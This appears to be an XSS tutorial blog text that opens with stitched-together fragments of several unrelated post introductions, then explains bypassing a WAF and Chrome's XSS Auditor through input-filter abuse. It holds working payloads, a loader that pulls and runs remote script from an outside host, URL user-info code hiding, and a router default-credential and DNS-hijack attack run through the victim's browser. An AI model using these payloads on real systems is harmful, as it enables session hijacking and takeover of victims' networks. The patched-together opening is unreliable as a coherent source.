More than a year ago, on my private Twitter account Brutal Secrets, I shared an interesting way to bypass Google Chrome’s anti-XSS filter, the XSS Auditor. We will now see in detail, from a black-box perspective, the logical sequence of assumptions and conclusions that leads to the XSS vector responsible for the bypass.
When reading material on the subject of XSS, we usually see the classic <script>alert(1)</script> as a demonstration of the vulnerability (a PoC – Proof of Concept). While valid, it rarely goes much beyond that, leaving newcomers to the field looking for more in order to deal with real-world scenarios.
CMSes (Content Management Systems) are a perfect target for XSS attacks: with their module-installation features and the possibility of knowing in advance all the requests made by a legitimate administrator of the system, it’s pretty easy to mount a CSRF (Cross-Site Request Forgery) attack against him or her.
Some sites offer spell checking as a feature of their search functionality or translation application. While this might be a good idea from a user’s perspective, it can also be a bad idea for someone trying to avoid XSS in his or her code.
Some weeks ago, an XSS challenge was launched: the goal was to pop an alert(1) box in the latest Google Chrome at the time (version 53). The code was minified (reduced to a single continuous line), which always brings interesting possibilities for handling injected input. There was also a CSP (Content Security Policy) header that didn’t allow external calls.
After a tester or attacker is able to pop an alert box, the next step is to call an external script to do whatever he or she wants with the victim. In scenarios where XSS is not possible with “<script src=//HOST>” or similar, we need to build the request that loads our remote code.
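One common way to build that request at runtime is to create the script element with JavaScript itself. The construction below is an illustrative sketch (the host and handler are hypothetical, not a prescription from this post):

```javascript
// Sketch: when "<script src=//HOST>" itself is blocked, the payload can
// build the external load dynamically instead.
var host = '//brutelogic.com.br/0.js'; // hypothetical script location
var loader = "var s=document.createElement('script');" +
             "s.src='" + host + "';" +
             "document.body.appendChild(s);";

// The loader string is then dropped into an executing sink, e.g.:
var payload = '<svg onload="' + loader + '">';
console.log(payload);
```

When injected, the onload handler runs the loader code, which fetches and executes the remote script in the victim’s session.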
Since the very first days of the World Wide Web, web applications have been a great target for hackers’ minds. New ways to interact with systems via the HTTP protocol and related technologies gave rise to a whole set of attacks. But even now, some of them remain very special: Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Structured Query Language injection (SQLi) and Remote Code Execution (RCE).
The most straightforward and reliable way to bypass a protection standing between a tester/attacker and a target application is to turn the application’s own filtering practices against that very protection.
Whether for security reasons or not, a developer may apply some sort of filtering in his or her own code without realizing that it can be used to trick any other device or code standing between the application and its users. In this post we will see this affecting a WAF (Web Application Firewall) and a browser anti-XSS filter, both common mitigation solutions.
By using native language functions or custom ones, a developer can strip or replace whatever he or she considers a dangerous (or unnecessary) character or string. So let’s first see what happens when an application strips spaces from user input.
Here is a PHP page that reflects 2 URL parameters, “p” and “q”. The first one, “p”, is just a simple, unfiltered reflection. Because this page is not whitelisted in my WAF (Web Application Firewall) settings, we are not able to exploit this flaw in a common situation, as we can see below. In fact, this (excellent) security solution from Sucuri, named CloudProxy, can detect the XSS attempt even without the alert(1) part, with just a “<svg onload=” input.
The second parameter, “q”, is there to exemplify the bypass. Here is its PHP code:
echo str_replace(" ", "", $_GET["q"]);
which removes any spaces from the input. This is enough to trick CloudProxy and XSS Auditor, Google Chrome’s mitigation solution, at the same time.
By adding “+” (usually decoded as a white space by applications) in strategic places of the vector/payload, both security solutions fail because of the stripping of a single character. No WAF can see this as an XSS attack, because “<” is not immediately followed by an alphabetic character, and the Auditor can’t see it as similar enough to what is reflected in the source, which is how this solution catches XSS attempts.
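The effect can be simulated with a few lines of JavaScript. The payload below is an illustrative reconstruction based on the description above, not necessarily the exact vector used in the original bypass:

```javascript
// Simulates the effect of PHP's str_replace(" ", "", $_GET["q"]).
function stripSpaces(input) {
  return input.split(' ').join(''); // remove every literal space
}

// The "+" in the query string decodes to a space, so the request
// carries something like this (illustrative payload):
var sent = '< svg/onload=alert(1)>';

// A WAF inspecting "sent" sees no tag: "<" is followed by a space.
// The Auditor compares "sent" with what the page actually echoes:
var reflected = stripSpaces(sent);
console.log(reflected); // <svg/onload=alert(1)>
```

With the space gone, the reflected markup is a working vector, yet it never appeared in that form in the request that the protections inspected.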
They stand between what is sent by an attacker and what is actually echoed back by the application, which is not necessarily the same. Without a minimum match, there’s no way to identify the request as malicious.
Another way to use the application against its security measures is by abusing char/string replacement. Here is another page, this time with 4 URL parameters: “p”, “q”, “r” and “s”. This page is whitelisted in the WAF settings, because none of these tricks would be enough to bypass it: the presence of the replaced string (“<script”) in every request triggers WAF blocking. But they will work against the Auditor.
echo str_ireplace("<script", "", $_GET["q"]);
echo str_ireplace("<script", "InvalidTag", $_GET["r"]);
echo str_ireplace("<script", "<InvalidTag", $_GET["s"]);
As we can see below, using the “p” parameter, Auditor catches it easily.
With the “q” parameter, we can see “<script” being stripped.
So by placing it right where it would confuse the Auditor (in the middle of the “on” of an event handler), we can pop our alert.
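A minimal simulation of that filter, with an illustrative payload splitting the “on” of onload (the exact payload from the screenshots may differ):

```javascript
// Mimics PHP's str_ireplace("<script", "", $_GET["q"]):
// every case-insensitive occurrence of "<script" is removed.
function filterQ(input) {
  return input.replace(/<script/gi, '');
}

// "<script" sits in the middle of the "on" of the event handler,
// so the request no longer matches the response for the Auditor:
var sent = '<svg o<scriptnload=alert(1)>';
var reflected = filterQ(sent);
console.log(reflected); // <svg onload=alert(1)>
```

The filter itself stitches the broken handler back together, producing a vector that never appeared intact in the request.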
In the “r” parameter, the replacement issue is “fixed”: the developer replaces the string with a harmless one (as we can see in the wild), which messes with our previous construction.
Nice. Another interesting way to do this, though not as universally applicable as the previous one (because it can’t accept special characters), follows.
Using the replaced string as a label, it’s also possible to trigger the alert in a very elegant way.
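Since “InvalidTag” is a valid JavaScript identifier, it works as a label inside the handler. A sketch of the idea follows; the payload is my illustrative reconstruction:

```javascript
// Mimics str_ireplace("<script", "InvalidTag", $_GET["r"]).
function filterR(input) {
  return input.replace(/<script/gi, 'InvalidTag');
}

// "<script" is planted where its replacement will land as a
// JavaScript label, harmless syntax in front of alert(1):
var sent = '<svg onload=<script:alert(1)>';
var reflected = filterR(sent);
console.log(reflected); // <svg onload=InvalidTag:alert(1)>
```

In the reflected handler, "InvalidTag:" is simply a label, so alert(1) still runs.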
Unfortunately, none of the above replacement tricks works with the last parameter, “s”. The Auditor seems to flag the input due to the presence of the “<” character in both request and response.
But developers beware: this can’t be considered an anti-XSS solution, even if applied to all HTML tags (with a regex, for example). It opens another door for a tester/attacker, who can use the resulting “<InvalidTag” string with any of the tag-agnostic event handlers to form a new attack vector.
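A quick sketch of why: browsers render unknown elements anyway, so a handler attached to the replaced tag still fires. The handler choice below is illustrative:

```javascript
// Mimics str_ireplace("<script", "<InvalidTag", $_GET["s"]).
function filterS(input) {
  return input.replace(/<script/gi, '<InvalidTag');
}

// An unknown element still renders, and a tag-agnostic handler
// like onmouseover executes as soon as it is triggered:
var sent = '<script onmouseover=alert(1)>hover me</script>';
var reflected = filterS(sent);
console.log(reflected); // <InvalidTag onmouseover=alert(1)>hover me</script>
```

Note that the closing “</script>” is untouched (the “/” breaks the match), but that doesn’t matter: the opening <InvalidTag …> element is enough for the handler to fire.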
At the beginning of a URL lies an overlooked place that is useful for hiding things from server logs: the authentication part of the authority section. Check the full URL scheme below.
Unlike the fragment part, where we can use document properties like location.hash to store things that will never be sent to the server, the user information will be sent but will not appear in logs, for security reasons.
Using a slice of the string returned by the window.URL property, from character 7 to character 15, we pass to eval() the string we want to execute. For an HTTPS-enabled website, the right combination would be 8 and 16, respectively.
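The character math can be checked against a plain string. The address below is a hypothetical example of a URL carrying the code in its user-info part:

```javascript
// Hypothetical address: "alert(1)" rides in the user-info part,
// between the "//" and the "@" of the authority section.
var address = 'http://alert(1)@brutelogic.com.br/xss.php';

// "http://" is 7 characters, so the code starts at index 7;
// "alert(1)" is 8 characters, ending at index 15 (exclusive).
var code = address.slice(7, 15);
console.log(code); // alert(1)

// In the page, the injected payload would be along the lines of:
//   <svg onload=eval(URL.slice(7,15))>
// For https:// the offsets shift by one: slice(8, 16).
```

Whatever fits in the user-info part can be executed this way, while the server log only records the path and query of the request.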
Although Firefox shows a security warning (Chrome does not), its statement about the domain being visited (brutelogic.com.br) may lead the user to a wrong conclusion.
After that, there will be no trace in the browser address bar of what really happened.
The same can be done with the location property of the document if eval() is not available.
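One hypothetical way to do it, my own illustration rather than necessarily the construction from the original post: carry a javascript: URL in the user-info part and assign the slice to location.

```javascript
// Hypothetical address: a javascript: URL rides in the user-info part
// ("javascript" as the user, "alert(1)" as the password).
var address = 'http://javascript:alert(1)@brutelogic.com.br/';

// Indices 7 to 26 (exclusive) cover "javascript:alert(1)":
var target = address.slice(7, 26);
console.log(target); // javascript:alert(1)

// The injected payload would then be something like:
//   <svg onload=location=URL.slice(7,26)>
```

Navigating to a javascript: URL executes the code in the current page, so assigning it to location replaces the eval() call.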
But much more harmful is using this ability to actually perform some kind of authentication. Because the victim of an XSS attack can be made to perform requests to internal IP addresses, it’s possible to pivot to devices accessible only to the victim.
Most SOHO (Small Office / Home Office) routers are vulnerable to login attacks over this channel, so all an attacker has to do is guess the right entry in a small list of common default credentials. He or she then proceeds with a basic CSRF attack to add his or her own DNS server to the router configuration, achieving total control over the victim’s network. But the latest Firefox (version 48) is smart enough to stop the automation and warn the user about it.
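The guessing step amounts to enumerating credentialed URLs. The router address and credential list below are illustrative, not taken from the original test page:

```javascript
// Illustrative sketch: building credentialed URLs for a guessed
// router address from a short list of common default credentials.
var router = '192.168.1.1'; // hypothetical internal address
var creds = ['admin:admin', 'admin:password', 'root:root'];

var attempts = creds.map(function (pair) {
  // user-info goes right before the host in the authority section
  return 'http://' + pair + '@' + router + '/';
});
console.log(attempts[0]); // http://admin:admin@192.168.1.1/
```

The victim’s browser is then made to request each of these URLs in turn; whichever one succeeds authenticates the session for the follow-up CSRF against the router configuration.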
The same can’t be said about the latest Chrome (version 52): once again, there is no security warning.
Click here to test your own router (Firefox or Chrome). If, after clicking on “click me”, your router dashboard appears, you may be in serious trouble.